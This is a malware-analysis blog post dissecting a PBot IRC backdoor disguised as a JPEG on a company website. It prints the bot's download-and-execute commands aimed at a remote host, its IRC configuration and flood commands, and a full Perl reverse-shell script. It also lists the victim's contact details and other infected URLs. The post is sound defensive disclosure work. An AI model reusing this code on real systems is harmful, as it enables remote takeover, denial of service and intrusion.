A PBot (PHP + Perl Backdoor IRC Bot + Network Attack Tool) Infection on hegeman.com
04 Jan 2013 PBot is a remote IRC Protocol Bot for usually used for taking over the infected machine into network malicious tool for PortScanning, DoS + etc acts.It has been a long time for analyzing an active PBot, our previous post abut Pbot are here>>[CLICK]. This new one just spotted accidentally in my watch this new year. I trailed back infection started from before Christmas and noted its activities until yesterday. There's nothing special about this infection instead the ignorance of the domain owner which I informed him by severeal times, without getting response nor removal act.
This PBot is a plain textual script, camouflage its filename with a JPEG file extension, yes it contains some severe malicious functionalities of PBot which people should know about.
Below is the capture of its GUI, if you know how to execute this well:
(click to enlarge the pic below)
Victim: hegeman.com, Infection method probability: credentials (90%), hacked (10%)
Contacts: (for alert information)Registrant:Infected/Injected URLs:
Hegeman Nijverdal BV
Postbus 224
Nijverdal, 7440AE, NL
Administrative Contact:
Hoksbergen, B b.hoksbergen@hegeman.com
Postbus 224
Nijverdal, 7440AE, NL +31.548611000
Technical Contact:
Diensten, Online kpni@kpn.com
Maanplein 55
Den Haag, 2516CK, NL +31.8000403h00p://hegeman.com/configs.jpgMy log in downloading above url to get sample:
h00p://hegeman.com/images/configs.jpg
h00p://hegeman.com/tmp/configs.jpg?
h00p://www.hegeman.com/configs.jpg
h00p://www.hegeman.com/images/configs.jpg
h00p://www.hegeman.com/tmp/configs.jpgResolving hegeman.com... seconds 0.00, 213.75.22.52What looks like an image JPEG file is actually a script, to be executed under infected machine's PHP from remote via infected url. Let's see the significant malicious points of this script: The header of this PBot:
Caching hegeman.com => 213.75.22.52
Connecting to hegeman.com|213.75.22.52|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5448 (new refcount 1).
GET /configs.jpg HTTP/1.0
Accept: */*
Host: hegeman.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 04 Jan 2013 07:34:48 GMT
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Last-Modified: Thu, 03 Jan 2013 00:44:47 GMT
ETag: "961813c-99e7-ab6eddc0"
Accept-Ranges: bytes
Content-Length: 39399
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
200 OK
Registered socket 1896 for persistent reuse.
Length: 39,399 (38K) [image/jpeg]
17:39:35 (10.59 KB/s) - `configs.jpg' saved [39399/39399]_/ |_ __ _____ ___ _____| |__ _____ __| _/______ _ __It downloads the components from remote:
\ __\ | \ \/ / / ___/ | \\__ \ / __ |/ _ \ \/ \/ /
| | | | /> < \___ \| Y \/ __ \_/ /_/ ( <_> ) /
|__| |____//__/\_ \_____/____ >___| (____ /\____ |\____/ \/\_/
\/_____/ \/ \/ \/ \/
<br/><?
$dir = @getcwd();
echo "DON TUKULESTO <br>";
$OS = @PHP_OS;
echo "OSTYPE :$OS <br>";
echo "uname -a; $uname <br>";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
echo "SM: 1 \\ ";$url="h00p://miri.wap.sh/";Or download from "other" server with varied method of execution like: exec, @popen, shell_exec, system, passthru, etc..., i.e.:
exec('cd /tmp;curl -O '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;GET '.$url.'mild.txt > mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;lwp-download '.$url.'mild.txt;perl mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;fetch '.$url.'mild.txt >mild.txt;perl mild.txt;rm -rf mild.txt*;');@popen('cd /tmp;wget '.$url.'perl.txt;perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");This PBot has the connectivity contains the bad actor's IRC ID behind it:
@popen('cd /tmp;curl -O '.$url.'perl.txt; perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
:var $config=array("server"=>"irc.javairc.org", // ip/host da redeBelow are Pbot's (basic) commands, you'll see some remote act + TCP/UDP flood commands..
"port"=>"6667", // porta da rede
"pass"=>"", // senha da rede
"prefix"=>"dos", // nick do bot
"maxrand"=>"4", // quantidade de numero no nick do bot
"chan"=>"#seve", // canal que os bots vao entrar
"chan2"=>"#seve", // canal aonde os bots v縊 mandar as vulns ao conectar (-n)
"key"=>"sempakz", // senha do canal
"modes"=>"+p", // modos do bot
"password"=>"sempakz", // senha pra acesso (.user SENHA)
"trigger"=>".", // prefico dos comandos
"hostauth"=>"@newbie.aja" // host dos owners (* for any hostname)* .user <password> //login to the botThe callback is as per below function, to be saved+executed locally with perl (dc.pl):
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)function conback($ip,$port)Whatever the above base64 hashed code is, never be good, Let's decode it to find out what it is.. end up w/the backdoor logic:
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");#!/usr/bin/perl↑Now we know how this Bot connect motherships, this protocol can be used to send/receive data. The Virus Total detection ratio is not bad at all:
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";MD5: 06a940dd7824d6a3a6d5b484bb7ef9d5 File size: 38.5 KB ( 39399 bytes ) File name: configs.jpg File type: PHP Detection ratio: 29 / 46 URL:------>>[CLICK]I wonder why the owner won't delete this script from the server.. For more research of the recent PBot infections, below are infected urls:h00p://eskipazari・com/images/products/large/rabot.txt
h00p://www.bohmans・ru/netcat/modules/forum2/images/pbbb.txt
h00p://asiandogs.・u/dog/crime/byroe.jpg
h00p://agefocus・net/wp-includes/js/jcrop/six/star.jpg
h00p://myghost.myqr・sg/bbs/logs/rabot.txt
h00p://www.nenskinder・com/wp-content/rabot.txt
h00p://www.airsoftpark・com/custompatchimg/pa.txt
h00p://neverbeentobali・com/wp-content/rabot.txt
h00p://flickr.com.oyun-max・com/bot.txt
#MalwareMustDie!